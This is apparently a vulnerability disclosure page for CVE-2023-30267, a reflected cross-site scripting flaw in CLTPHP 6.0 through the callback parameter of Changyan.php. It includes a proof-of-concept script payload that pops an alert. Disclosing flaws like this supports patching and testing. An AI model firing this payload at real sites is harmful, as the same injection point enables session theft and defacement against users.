Headline
CVE-2023-30267: HuBenVulList/CLTPHP6.0 Reflected cross-site scripting(XSS).md at main · HuBenLab/HuBenVulList
CLTPHP <=6.0 is vulnerable to Cross Site Scripting (XSS) via application/home/controller/Changyan.php.
Permalink
Cannot retrieve contributors at this time
CLTPHP <= 6.0 Reflected cross-site scripting(XSS)****Description
The system client does not handle GET parameters correctly, resulting in reflected cross-site scripting (XSS).
Vendor Homepage
https://gitee.com/chichu/cltopen/
https://www.cltphp.com/
Author****Proof of Concept
File:application/home/controller/Changyan.php
payload:
?callback=<script>alert(%27Vulnerable%27);</script>